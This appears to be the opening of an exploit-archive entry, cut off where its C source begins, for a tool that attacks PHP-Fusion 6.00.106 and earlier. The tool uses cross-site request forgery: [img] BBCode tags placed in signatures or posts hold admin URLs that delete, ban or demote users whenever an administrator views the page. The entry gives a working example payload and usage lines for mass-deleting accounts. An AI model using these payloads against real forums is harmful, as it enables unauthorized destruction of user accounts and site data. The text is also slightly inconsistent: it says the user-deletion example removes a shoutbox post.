/* ahh I was hoping for some socket code :( /str0ke Dark Assassins - http://dark-assassins.com/ Visit us on IRC @ irc.tddirc.net #DarkAssassins PHP-Fusion [img][/img] exploit Discovered/Coded by Easyex Using the [img] [/img] codes we can get an administrator to do a function a normal member cannot do. For example.. [img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img] This could be in our signature, forum post or in a comment post. When an admin views the page with the malicious code it will automatically load and do the function we selected. In the example it would delete the shout box post with the id 1. Because we are using the [img] [/img] code it just shows up as an invalid image. Code usage: ./fusionimg deluser ./fusionimg banuser ./fusionimg delshout ./fusionimg deladmin is the PHP-Fusion version. enter 6.x or 5.x depending on the version number. is the start point of user id(s) is the end point of the user id(s) So if we had a vulnerable host running PHP Fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5 */ #include #include #include int usage() { printf("Usage: ./fusionimg